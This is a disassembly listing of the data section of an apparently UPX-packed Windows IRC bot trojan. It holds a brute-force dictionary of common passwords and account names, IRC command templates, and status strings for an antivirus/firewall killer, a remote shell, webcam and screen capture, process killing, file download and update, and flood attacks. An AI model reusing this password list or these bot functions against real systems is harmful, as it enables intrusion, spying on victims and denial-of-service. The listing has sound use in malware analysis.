dword_4294D4 dd 10h ; DATA XREF: sub_401ACD+AFC�r
; sub_401ACD+B28�r ...
aIntranet db 'intranet',0 ; DATA XREF: UPX0:004294C0�o
align 4
aLan db 'lan',0 ; DATA XREF: UPX0:004294B8�o
aMain db 'main',0 ; DATA XREF: UPX0:004294B4�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: UPX0:004294B0�o
aBlank db 'blank',0 ; DATA XREF: UPX0:004294AC�o
align 10h
aOffice db 'office',0 ; DATA XREF: UPX0:004294A8�o
align 4
aControl db 'control',0 ; DATA XREF: UPX0:004294A4�o
aXp db 'xp',0 ; DATA XREF: UPX0:004294A0�o
align 4
aNokia db 'nokia',0 ; DATA XREF: UPX0:0042949C�o
align 4
aHp db 'hp',0 ; DATA XREF: UPX0:00429498�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: UPX0:00429494�o
aCompaq db 'compaq',0 ; DATA XREF: UPX0:00429490�o
align 10h
aDell db 'dell',0 ; DATA XREF: UPX0:0042948C�o
align 4
aCisco db 'cisco',0 ; DATA XREF: UPX0:00429488�o
align 10h
aIbm db 'ibm',0 ; DATA XREF: UPX0:00429484�o
aOrainstall db 'orainstall',0 ; DATA XREF: UPX0:0042947C�o
align 10h
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: UPX0:00429478�o
align 4
aSql db 'sql',0 ; DATA XREF: UPX0:00429474�o
aSa db 'sa',0 ; DATA XREF: sub_401ACD+1BFD�o
; UPX0:00429470�o
align 4
aDb1234 db 'db1234',0 ; DATA XREF: UPX0:0042946C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: UPX0:00429464�o
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: UPX0:00429460�o
align 4
aData db 'data',0 ; DATA XREF: UPX0:0042945C�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: UPX0:00429458�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: UPX0:00429454�o
align 10h
aDbpass db 'dbpass',0 ; DATA XREF: UPX0:00429450�o
align 4
aAccess db 'access',0 ; DATA XREF: UPX0:0042944C�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: UPX0:00429444�o
align 10h
aDomainpass db 'domainpass',0 ; DATA XREF: UPX0:00429440�o
align 4
aDomain db 'domain',0 ; DATA XREF: UPX0:0042943C�o
align 4
aHello db 'hello',0 ; DATA XREF: UPX0:00429438�o
align 4
aHell db 'hell',0 ; DATA XREF: UPX0:00429434�o
align 4
aGod db 'god',0 ; DATA XREF: UPX0:00429430�o
aSex db 'sex',0 ; DATA XREF: UPX0:0042942C�o
; UPX0:off_4385E8�o
aSlut db 'slut',0 ; DATA XREF: UPX0:00429428�o
align 4
aBitch db 'bitch',0 ; DATA XREF: UPX0:00429424�o
align 4
aFuck db 'fuck',0 ; DATA XREF: UPX0:00429420�o
align 4
aExchange db 'exchange',0 ; DATA XREF: UPX0:0042941C�o
align 10h
aBackup db 'backup',0 ; DATA XREF: UPX0:00429418�o
align 4
aTechnical db 'technical',0 ; DATA XREF: UPX0:00429414�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: UPX0:00429410�o
align 10h
aLogin db 'login',0 ; DATA XREF: sub_401ACD+AA3�o
; UPX0:0042940C�o
align 4
aMary db 'mary',0 ; DATA XREF: UPX0:00429408�o
align 10h
aKatie db 'katie',0 ; DATA XREF: UPX0:00429404�o
align 4
aKate db 'kate',0 ; DATA XREF: UPX0:004293FC�o
align 10h
aGeorge db 'george',0 ; DATA XREF: UPX0:004293F8�o
align 4
aEric db 'eric',0 ; DATA XREF: UPX0:004293F4�o
align 10h
aChris db 'chris',0 ; DATA XREF: UPX0:004293F0�o
align 4
aIan db 'ian',0 ; DATA XREF: UPX0:004293EC�o
aNeil db 'neil',0 ; DATA XREF: UPX0:004293E8�o
align 4
aLee db 'lee',0 ; DATA XREF: UPX0:004293E4�o
aBrian db 'brian',0 ; DATA XREF: UPX0:004293E0�o
align 10h
aSusan db 'susan',0 ; DATA XREF: UPX0:004293D8�o
align 4
aSue db 'sue',0 ; DATA XREF: UPX0:004293D4�o
aSam db 'sam',0 ; DATA XREF: UPX0:004293D0�o
aLuke db 'luke',0 ; DATA XREF: UPX0:004293CC�o
align 4
aPeter db 'peter',0 ; DATA XREF: UPX0:004293C8�o
; UPX0:004293DC�o
align 10h
aJohn db 'john',0 ; DATA XREF: UPX0:004293C4�o
align 4
aMike db 'mike',0 ; DATA XREF: UPX0:004293C0�o
align 10h
aBill db 'bill',0 ; DATA XREF: UPX0:004293BC�o
align 4
aFred db 'fred',0 ; DATA XREF: UPX0:004293B8�o
align 10h
aJoe db 'joe',0 ; DATA XREF: UPX0:004293B4�o
aJen db 'jen',0 ; DATA XREF: UPX0:004293B0�o
aBob db 'bob',0 ; DATA XREF: UPX0:004293AC�o
; UPX0:00429400�o
aQwe db 'qwe',0 ; DATA XREF: UPX0:004293A8�o
aZxc db 'zxc',0 ; DATA XREF: UPX0:004293A4�o
aAsd db 'asd',0 ; DATA XREF: UPX0:004293A0�o
aQaz db 'qaz',0 ; DATA XREF: UPX0:0042939C�o
aWin2000 db 'win2000',0 ; DATA XREF: UPX0:00429398�o
aWinnt db 'winnt',0 ; DATA XREF: UPX0:00429394�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: UPX0:00429390�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: UPX0:0042938C�o
align 4
aWin98 db 'win98',0 ; DATA XREF: UPX0:00429388�o
align 4
aWindows db 'windows',0 ; DATA XREF: UPX0:00429384�o
aOeminstall db 'oeminstall',0 ; DATA XREF: UPX0:00429380�o
align 4
aOemuser db 'oemuser',0 ; DATA XREF: UPX0:0042937C�o
aOem db 'oem',0 ; DATA XREF: UPX0:00429378�o
aUser db 'user',0 ; DATA XREF: sub_401ACD+46D4�o
; UPX0:00429374�o
align 4
aHomeuser db 'homeuser',0 ; DATA XREF: UPX0:00429370�o
align 4
aHome db 'home',0 ; DATA XREF: UPX0:0042936C�o
align 10h
aAccounting db 'accounting',0 ; DATA XREF: UPX0:00429368�o
align 4
aAccounts db 'accounts',0 ; DATA XREF: UPX0:00429364�o
align 4
aInternet db 'internet',0 ; DATA XREF: UPX0:00429360�o
; UPX0:004294BC�o
align 4
aWww db 'www',0 ; DATA XREF: UPX0:0042935C�o
aWeb db 'web',0 ; DATA XREF: UPX0:00429358�o
aOutlook db 'outlook',0 ; DATA XREF: UPX0:00429354�o
aMail db 'mail',0 ; DATA XREF: UPX0:00429350�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: UPX0:0042934C�o
align 4
aNull_1 db 'null',0 ; DATA XREF: UPX0:00429348�o
align 4
aServer db 'server',0 ; DATA XREF: sub_401ACD+3E90�o
; UPX0:00429340�o
align 4
aSystem db 'system',0 ; DATA XREF: UPX0:0042933C�o
align 4
aChangeme db 'changeme',0 ; DATA XREF: UPX0:00429334�o
align 4
aLinux db 'linux',0 ; DATA XREF: UPX0:00429330�o
align 10h
aUnix db 'unix',0 ; DATA XREF: UPX0:0042932C�o
align 4
aDemo db 'demo',0 ; DATA XREF: UPX0:00429328�o
align 10h
aNone db 'none',0 ; DATA XREF: UPX0:00429324�o
align 4
aTest db 'test',0 ; DATA XREF: UPX0:0042931C�o
align 10h
a2004 db '2004',0 ; DATA XREF: UPX0:00429318�o
align 4
a2003 db '2003',0 ; DATA XREF: sub_41AA43+BA�o
; UPX0:00429314�o
align 10h
a2002 db '2002',0 ; DATA XREF: UPX0:00429310�o
align 4
a2001 db '2001',0 ; DATA XREF: UPX0:0042930C�o
align 10h
a2000 db '2000',0 ; DATA XREF: UPX0:00429308�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: UPX0:00429304�o
align 4
a123456789 db '123456789',0 ; DATA XREF: UPX0:00429300�o
align 10h
a12345678 db '12345678',0 ; DATA XREF: UPX0:004292FC�o
align 4
a1234567 db '1234567',0 ; DATA XREF: UPX0:004292F8�o
a123456 db '123456',0 ; DATA XREF: UPX0:004292F4�o
align 4
a12345 db '12345',0 ; DATA XREF: UPX0:004292F0�o
align 4
a1234 db '1234',0 ; DATA XREF: UPX0:004292EC�o
align 4
a123 db '123',0 ; DATA XREF: UPX0:004292E8�o
a12 db '12',0 ; DATA XREF: UPX0:004292E4�o
align 4
a1: ; DATA XREF: UPX0:004292E0�o
unicode 0, <1>,0
a007 db '007',0 ; DATA XREF: UPX0:004292DC�o
aPwd db 'pwd',0 ; DATA XREF: UPX0:004292D8�o
aPass_0 db 'pass',0 ; DATA XREF: UPX0:004292D4�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: UPX0:004292D0�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: UPX0:004292CC�o
align 4
aPassword db 'password',0 ; DATA XREF: UPX0:004292C8�o
align 4
aPassword1 db 'password1',0 ; DATA XREF: UPX0:004292C4�o
align 4
aAdm db 'adm',0 ; DATA XREF: UPX0:004292C0�o
aDb2 db 'db2',0 ; DATA XREF: UPX0:00429468�o
aOracle db 'oracle',0 ; DATA XREF: UPX0:00429480�o
align 4
aDba db 'dba',0
aDatabase db 'database',0 ; DATA XREF: UPX0:00429448�o
align 4
aDefault db 'default',0 ; DATA XREF: UPX0:00429338�o
aGuest_0 db 'guest',0 ; DATA XREF: UPX0:00429320�o
align 4
aWwwadmin db 'wwwadmin',0
align 10h
aTeacher db 'teacher',0 ; DATA XREF: UPX0:004294C8�o
aStudent db 'student',0 ; DATA XREF: UPX0:004294C4�o
aOwner db 'owner',0
align 4
aComputer db 'computer',0
align 4
aRoot db 'root',0 ; DATA XREF: UPX0:00429344�o
align 4
aStaff db 'staff',0 ; DATA XREF: UPX0:004294CC�o
align 4
aAdmin db 'admin',0 ; DATA XREF: UPX0:004292BC�o
align 4
aAdmins db 'admins',0 ; DATA XREF: UPX0:004292B8�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: UPX0:004292B4�o
aAdministrateur db 'administrateur',0 ; DATA XREF: UPX0:004292B0�o
align 10h
aAdministrador db 'administrador',0 ; DATA XREF: UPX0:004292AC�o
align 10h
aAdministrato_0 db 'administrator',0 ; DATA XREF: UPX0:004292A8�o
align 10h
aMircV6_21Khale db 'mIRC v6.21 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:00429174�o
align 10h
aMircV6_20Khale db 'mIRC v6.20 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:00429170�o
align 10h
aMircV6_17Khale db 'mIRC v6.17 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:0042916C�o
align 10h
aMircV6_16Khale db 'mIRC v6.16 Khaled Mardam-Bey',0 ; DATA XREF: UPX0:off_429168�o
align 10h
a@admin_com db '*@admin.com',0 ; DATA XREF: UPX0:off_429164�o
dword_4299DC dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+46B�o
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 10h
dword_429A10 dd 234032Dh, 6E656469h, 2036474h ; DATA XREF: sub_401221+420�o
aServerRunningO db '- Server running on Port: 113.',0
align 4
unk_429A3C db 2Dh ; - ; DATA XREF: sub_401221+3F3�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 4
unk_429A7C db 2Dh ; - ; DATA XREF: sub_401221+3A2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 10h
dword_429AA0 dd 234032Dh, 6E69616Dh, 202D0203h, 20746F42h, 72617473h
; DATA XREF: sub_401221+364�o
dd 2E646574h, 0
dword_429ABC dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_401221+28F�o
dword_429AC8 dd 255C7325h, 73h ; DATA XREF: sub_401221+189�o
; sub_415A30+7E�o ...
dword_429AD0 dd 73257325h, 0 ; DATA XREF: sub_401221+10D�o
; sub_40F6B4+EA�o ...
unk_429AD8 db 2Dh ; - ; DATA XREF: sub_4017ED+F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401955+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401955+35�o
align 10h
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7F2F�o
align 10h
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+7F17�o
align 10h
unk_429B40 db 2Dh ; - ; DATA XREF: sub_401ACD+7F0A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
unk_429B60 db 2Dh ; - ; DATA XREF: sub_401ACD+7EED�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPasswordAccept db 'Password accepted.',0
align 10h
unk_429B80 db 2Dh ; - ; DATA XREF: sub_401ACD+7E8C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 4
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7E63�o
align 4
unk_429BD4 db 2Dh ; - ; DATA XREF: sub_401ACD+7E25�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 10h
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7E13�o
; sub_401ACD+7E7A�o
align 4
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401ACD+7DFC�o
align 4
asc_429C54: ; DATA XREF: sub_401ACD+7DCC�o
unicode 0, <~>,0
unk_429C58 db 2Dh ; - ; DATA XREF: sub_401ACD+7D7C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 4
unk_429C7C db 2Dh ; - ; DATA XREF: sub_401ACD+7D0C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnectingIn db 'Reconnecting in %s seconds',0
align 4
unk_429CA4 db 2Dh ; - ; DATA XREF: sub_401ACD+7CC4�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReconnecting_0 db 'Reconnecting in %s ms',0
align 4
unk_429CC8 db 2Dh ; - ; DATA XREF: sub_401ACD+7CA2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNickChangedToS db 'Nick changed to: ',27h,'%s',27h,'.',0
align 4
unk_429CEC db 2Dh ; - ; DATA XREF: sub_401ACD+7C82�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: ',27h,'%s',27h,'.',0
align 10h
unk_429D10 db 2Dh ; - ; DATA XREF: sub_401ACD+7C5B�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPartedChannelS db 'Parted channel: ',27h,'%s',27h,'.',0
align 4
dword_429D34 dd 234032Dh, 6E69616Dh, 202D0302h, 20435249h, 3A776152h
; DATA XREF: sub_401ACD+7C3B�o
dd 2E732520h, 0
unk_429D50 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409685�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aFailedToKillTh db '- Failed to kill thread: %s.',0
align 4
unk_429D7C db 2Dh ; - ; DATA XREF: sub_401ACD+7BB1�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aKilledThreadS_ db '- Killed thread: %s.',0
align 10h
unk_429DA0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4095FD�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aNoActiveThread db '- No active threads found.',0
unk_429DC8 db 2Dh ; - ; DATA XREF: sub_401ACD+7B26�o
db 3, 34h, 2
db 74h ; t
db 68h, 72h, 65h
db 61h ; a
db 64h, 73h, 2
db 3
aStoppedDThread db '- Stopped: %d thread(s).',0
align 10h
aAll db 'all',0 ; DATA XREF: sub_401ACD+7B0C�o
unk_429DF4 db 2Dh ; - ; DATA XREF: sub_401ACD+79FF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrefixChangedT db 'Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_429E1C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4094B3�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0
unk_429E40 db 2Dh ; - ; DATA XREF: sub_401ACD+79DC�o
db 3, 34h, 2
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFileOpenedS db ' File opened: %s',0
align 10h
unk_429E60 db 2Dh ; - ; DATA XREF: sub_401ACD+79B8�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0
align 4
unk_429E88 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409468�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0
align 10h
unk_429EB0 db 2Dh ; - ; DATA XREF: sub_401ACD+796D�o
db 3, 34h, 2
db 64h ; d
db 6Eh, 73h, 2
db 3
aLookupSS_ db '- Lookup: %s -> %s.',0
align 10h
unk_429ED0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4093FD�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTermin db ' Failed to terminate process: %s',0
align 10h
unk_429F00 db 2Dh ; - ; DATA XREF: sub_401ACD+7926�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledS db ' Process killed: %s',0
unk_429F20 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409399�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aFailedToTerm_0 db ' Failed to terminate process ID: %s',0
unk_429F50 db 2Dh ; - ; DATA XREF: sub_401ACD+78C5�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessKilledI db ' Process killed ID: %s',0
align 4
dword_429F74 dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h
; DATA XREF: sub_401ACD+7885�o
dd 27732527h, 2Eh
unk_429F90 db 2Dh ; - ; DATA XREF: sub_401ACD+7803�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aSendFileSUserS db '- Send File: %s, User: %s.',0
dword_429FB4 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah
; DATA XREF: sub_401ACD+7786�o
dd 0
unk_429FCC db 2Dh ; - ; DATA XREF: sub_401ACD+7755�o
db 3, 34h, 2
db 76h ; v
db 69h, 73h, 69h
db 74h ; t
db 2, 3, 2Dh
aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0
align 4
dword_42A00C dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 7325203Ah
; DATA XREF: sub_401ACD+76E6�o
dd 2Eh
dword_42A024 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h
; DATA XREF: sub_401ACD:loc_409140�o
dd 746E6573h, 2Eh
unk_42A040 db 2Dh ; - ; DATA XREF: sub_401ACD+766C�o
db 3, 34h, 2
db 6Dh ; m
db 69h, 72h, 63h
db 2
db 3, 2Dh, 20h
aClientNotOpen_ db 'Client not open.',0
align 10h
dword_42A060 dd 234032Dh, 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh
; DATA XREF: sub_401ACD+7630�o
dd 732520h
unk_42A078 db 2Dh ; - ; DATA XREF: sub_401ACD+7611�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aErrorSendingTo db '- Error sending to remote shell.',0
align 4
asc_42A0A4: ; DATA XREF: sub_401ACD+75F9�o
; sub_40F6B4+FB�o ...
dw 0Ah
unicode 0, <>,0
unk_42A0A8 db 2Dh ; - ; DATA XREF: sub_401ACD+75CF�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileFailed db 'Read file failed: %s',0
align 4
unk_42A0CC db 2Dh ; - ; DATA XREF: sub_401ACD+75C2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aReadFileComple db 'Read file complete: %s',0
align 10h
unk_42A0F0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40901F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_0 db '- Invalid parameters for amateur video capture.',0
align 10h
unk_42A130 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409015�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCapt db '- Error while capturing amateur video from webcam.',0
unk_42A170 db 2Dh ; - ; DATA XREF: sub_401ACD+753E�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aAmateurVideoSa db '- Amateur video saved to: %s.',0
align 4
aVideo db 'video',0 ; DATA XREF: sub_401ACD:loc_408F87�o
align 4
unk_42A1A4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408F74�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aInvalidParam_1 db '- Invalid parameters for webcam capture.',0
align 4
unk_42A1DC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408F6D�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_0 db '- Error while capturing from webcam.',0
align 10h
unk_42A210 db 2Dh ; - ; DATA XREF: sub_401ACD+7490�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aWebcamCaptureS db '- Webcam capture saved to: %s.',0
aFrame db 'frame',0 ; DATA XREF: sub_401ACD:loc_408EE6�o
align 4
unk_42A244 db 2Dh ; - ; DATA XREF: sub_401ACD+740C�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverListComp db '- Driver list complete.',0
align 4
unk_42A26C db 2Dh ; - ; DATA XREF: sub_401ACD+73D9�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aDriverDSS_ db '- Driver #%d - %s - %s.',0
align 4
aDrivers db 'drivers',0 ; DATA XREF: sub_401ACD:loc_408E59�o
unk_42A29C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408E46�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aNoFilenameSpec db '- No filename specified for screen capture.',0
align 4
unk_42A2D8 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408E3F�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aErrorWhileCa_1 db '- Error while capturing screen.',0
align 4
unk_42A308 db 2Dh ; - ; DATA XREF: sub_401ACD+7362�o
db 3, 34h, 2
db 63h ; c
db 61h, 70h, 74h
db 75h ; u
db 72h, 65h, 2
db 3
aScreenCaptureS db '- Screen capture saved to: %s.',0
aScreen db 'screen',0 ; DATA XREF: sub_401ACD:loc_408DFE�o
align 4
dword_42A33C dd 234032Dh, 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh
; DATA XREF: sub_401ACD+7319�o
dd 2E732520h, 0
unk_42A358 db 2Dh ; - ; DATA XREF: sub_401ACD+72D3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUnableToExtrac db 'Unable to extract Gethost command.',0
align 4
unk_42A388 db 2Dh ; - ; DATA XREF: sub_401ACD+72B7�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aGethostSComman db 'Gethost: %s, Command: %s',0
align 10h
unk_42A3B0 db 2Dh ; - ; DATA XREF: sub_401ACD+720A�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aAliasAddedS_ db 'Alias added: %s.',0
align 10h
unk_42A3D0 db 2Dh ; - ; DATA XREF: sub_401ACD+71D6�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPrivmsgSS_ db 'Privmsg: %s: %s.',0
align 10h
unk_42A3F0 db 2Dh ; - ; DATA XREF: sub_401ACD+7181�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aActionSS_ db 'Action: %s: %s.',0
dword_42A40C dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h
; DATA XREF: sub_401ACD+710F�o
dword_42A420 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_401ACD+70D5�o
; sub_401ACD+7C48�o
unk_42A42C db 2Dh ; - ; DATA XREF: sub_401ACD+70B0�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aModeChangeS db 'Mode change: %s',0
aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+709F�o
align 4
dword_42A454 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h
; DATA XREF: sub_401ACD+7074�o
dd 25203A29h, 73h
dword_42A470 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h
; DATA XREF: sub_401ACD+7005�o
dd 203A2973h, 7325h
dword_42A48C dd 45444F4Dh, 732520h ; DATA XREF: sub_401ACD+6FAA�o
dword_42A494 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh
; DATA XREF: sub_401ACD+6F7A�o
dd 203A2973h, 7325h
dword_42A4B0 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_401ACD+6F01�o
dword_42A4BC dd 0A0D7325h, 0 ; DATA XREF: sub_401ACD+6ECF�o
; sub_401ACD+6F58�o ...
dword_42A4C4 dd 54524150h, 732520h ; DATA XREF: sub_401ACD+6E96�o
dword_42A4CC dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6E85�o
aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0
align 4
dword_42A508 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6E16�o
aFloodingSForSS db '- Flooding %s for %s seconds.',0
align 4
unk_42A534 db 2Dh ; - ; DATA XREF: sub_401ACD+6D86�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0
align 10h
unk_42A570 db 2Dh ; - ; DATA XREF: sub_401ACD+6D1B�o
db 3, 34h, 2
db 74h ; t
db 73h, 75h, 6Eh
db 61h ; a
db 6Dh, 69h, 2
db 3
aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0
unk_42A5A4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408746�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRepeatNotAllow db 'Repeat not allowed in command line: %s',0
align 4
dword_42A5D8 dd 234032Dh, 6E69616Dh, 202D0302h, 65706552h, 203A7461h
; DATA XREF: sub_401ACD+6C3E�o
dd 7325h
dword_42A5F0 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h
; DATA XREF: sub_401ACD:loc_408674�o
dword_42A604 dd 25207325h, 73252073h, 73253A20h, 0 ; DATA XREF: sub_401ACD+6B63�o
; sub_401ACD+6C15�o ...
dword_42A614 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD:loc_4085D1�o
aBotIdMustBeDif db '- Bot ID must be different than current running process.',0
align 4
dword_42A65C dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6AFA�o
aFailedToStartD db '- Failed to start download thread, error: <%d>.',0
dword_42A698 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6A8B�o
